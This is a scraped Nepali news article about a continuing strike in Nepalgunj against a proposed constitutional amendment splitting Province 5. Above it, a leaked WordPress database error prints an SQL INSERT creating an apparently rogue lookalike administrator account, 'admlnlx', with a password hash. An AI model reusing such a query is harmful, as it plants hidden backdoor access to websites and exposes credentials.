WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM3RBVBzuL44q6XUovqfmoGu59eykw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-23 10:50:21', '', 'admlnlx', 'admlnlx')
कृष्ण आचार्य
नेपालगन्ज,पुस २ –
५ नम्बर प्रदेश टुक्राउने गरी संसदमा दर्ता भएको संविधान संशोधन प्रस्ताव विरुद्ध आयोजीत आमहड्तालले आज पनि नेपालगन्ज ठप्प छ । नेपालगन्जमा वन्दकर्ता झन् कडा रुपमा प्रस्तुत भएका छन् । नेपालगन्ज र कोहलपुरमा उनिहरु दिनभर बजार वन्द गराउदै हिडेका छन् ।केहि ठांउमा वन्दकर्ताले पसल र सवारी साधन समेत तोडफोड गरेका छन् । पूर्वपश्चिम राजमार्ग पनि ठप्प छ ।नेपालगन्जमा विहानैदेखी आन्दोलनकारी चोक चोकमा वसेर प्रर्दशन गरिरहेका छन् । शैक्षिकसंस्था र उद्योगधन्दा पनि शुक्रवारवाटै संचालन हुन सकेका छैनन् ।
नेपालगज्जमा विहान वेलुका वन्द खुकुलो पारिएपनि दिउसो भने थप कडाइ गरिएको छ ।सडकमा दूध तथा हरियो तरकारी, फलफूल बोकेका गाडी संचारकर्मीका साधन तथा एम्बुलेन्स भने चलेका छन् । ५ नम्बर प्रदेश टुक्राउने गरी संसदमा दर्ता भएको संविधान संशोधन जनचाहाना विपरित ल्याइएको एमाले जिल्ला उपाध्यक्ष निरक गुरुङले वताए । उनले संसोधन प्रस्ताव फिर्ता नभएसम्म नेपालगन्जमा आन्दोलन नरोकिने जानाकारी दिए ।
हेर्नुहोस तस्विरः